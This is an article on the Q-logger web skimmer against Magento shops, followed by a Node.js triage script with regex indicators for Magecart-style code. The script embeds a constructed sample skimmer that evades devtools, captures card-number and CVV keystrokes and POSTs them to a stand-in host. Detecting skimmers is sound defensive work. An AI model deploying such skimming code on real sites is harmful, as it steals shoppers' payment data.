With the explosive growth of the e-commerce sector, the cybercriminals behind Magecart and skimmer attacks have begun diversifying the scope of their operations, the methods they use and the infrastructure they deploy. One threat that exemplifies this trend is the recently discovered Q-logger skimmer, first detected by Eric Brandel.
Q-logger had been used in active campaigns for several months before security researchers caught on to the attackers' activities. The skimmer is either injected directly into the pages of the compromised e-commerce site or loaded from an external host. Once in place, it siphons the payment data of the infected site's customers, harvesting credit and debit card details as they are entered. The collected information is exfiltrated via POST requests to a domain under the attackers' control. Q-logger attacks mainly target smaller businesses that run their online shop on Magento.
Apart from the activities typical of skimmer threats, Q-logger displays several peculiar traits. The threat is equipped with multiple anti-analysis techniques. Beyond obfuscating the code, the attackers have paired the keylogging routine with checks that detect when browser developer tools have been opened; if any of these checks returns a positive result, Q-logger terminates its activity completely. Another technique observed in the Q-logger attacks is registering domains en masse, an effective strategy against blocklists. In addition, the operators compartmentalize their infrastructure to hide the real IP address of the hosting provider.
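As an added example (not Q-logger's code and not a sample from the original report), the Node.js triage script below scans a captured script body for the indicators the two paragraphs above describe: a developer-tools check, keystroke hooks on payment fields, and POST exfiltration to a host the shop does not own. The sample scripts, the hostnames `cdn-example.invalid` and `shop.example`, the `firstPartyHosts` parameter and the regular expressions are constructed assumptions; the heuristics are generic to Magecart-style skimmers rather than specific Q-logger signatures, and the `outerWidth - innerWidth` test in the sample is a widely known devtools-detection trick, not one attributed to Q-logger by the article.

```javascript
// Static triage of a captured <script> body for Magecart-style skimmer indicators.
// Added example, not Q-logger's code: the sample script below is constructed to
// resemble the behaviour described in the article (devtools check, keystroke
// capture on payment fields, POST exfiltration to an attacker-controlled host).

const INDICATORS = {
  // Anti-analysis: common ways client-side code notices open developer tools
  // (window-size delta heuristic, debugger statements, explicit "devtools" strings).
  devtoolsCheck: /outerWidth\s*-\s*(?:window\.)?innerWidth|outerHeight\s*-\s*(?:window\.)?innerHeight|\bdebugger\b|devtools/i,
  // Keystroke capture or input hooking on the page.
  keystrokeHook: /addEventListener\s*\(\s*['"](?:keydown|keyup|keypress|input|change)['"]/,
  // Payment-form vocabulary a skimmer filters on.
  paymentFields: /\b(?:cc_?number|card_?number|cvv|cvc|ccv|expir\w*|cardholder)\b/i,
  // Outbound channels a skimmer uses to ship harvested data.
  exfilChannel: /\bfetch\s*\(|XMLHttpRequest|sendBeacon|new\s+Image\s*\(/,
};

// Collect every hostname that appears inside an http(s) URL literal in the script.
function extractHosts(src) {
  const hosts = new Set();
  const re = /https?:\/\/([a-z0-9.-]+)/gi;
  let m;
  while ((m = re.exec(src)) !== null) hosts.add(m[1].toLowerCase());
  return [...hosts];
}

// firstPartyHosts: hostnames the shop legitimately talks to (assumption: the
// analyst supplies this list from the site's own configuration or CSP).
function triageScript(src, firstPartyHosts) {
  const fp = new Set(firstPartyHosts.map((h) => h.toLowerCase()));
  const hits = {};
  for (const [name, re] of Object.entries(INDICATORS)) hits[name] = re.test(src);
  const externalHosts = extractHosts(src).filter((h) => !fp.has(h));
  const score = Object.values(hits).filter(Boolean).length + (externalHosts.length ? 1 : 0);
  // Keystroke hooks on payment fields plus traffic to a host the shop does not own
  // is the core skimmer pattern; the devtools check on top is the anti-analysis
  // trait the article singles out and only raises the score further.
  let verdict = 'clean';
  if (hits.keystrokeHook && hits.paymentFields && externalHosts.length > 0) verdict = 'likely-skimmer';
  else if (score >= 2) verdict = 'suspicious';
  return { hits, externalHosts, score, verdict };
}

// Constructed sample resembling the described behaviour (not real skimmer code).
const SAMPLE_SKIMMER = `
(function(){
  if (window.outerWidth - window.innerWidth > 160) { return; } // bail out if devtools are open
  var buf = {};
  document.addEventListener('keyup', function(e){
    var n = e.target && e.target.name;
    if (/card_number|cvv|expiry/i.test(n)) { buf[n] = e.target.value; }
  });
  setInterval(function(){
    fetch('https://cdn-example.invalid/collect', {method:'POST', body: JSON.stringify(buf)});
  }, 5000);
})();
`;

// Constructed benign script: first-party API call, no keystroke hooks.
const SAMPLE_BENIGN = `
document.addEventListener('DOMContentLoaded', function(){
  fetch('https://shop.example/api/cart', {method:'GET'}).then(r => r.json());
});
`;

// Stand-alone usage: run against both samples with the shop's own host allowlisted.
console.log(JSON.stringify(triageScript(SAMPLE_SKIMMER, ['shop.example']), null, 2));
console.log(JSON.stringify(triageScript(SAMPLE_BENIGN, ['shop.example']), null, 2));
```

The external-host check is the part worth wiring into a real pipeline: a first-party allowlist built from the shop's CSP `connect-src` and `form-action` directives turns the mass-registered domains the article mentions into a strong signal, because each new exfiltration domain shows up as a host the site never declared, regardless of whether a blocklist has caught up with it yet.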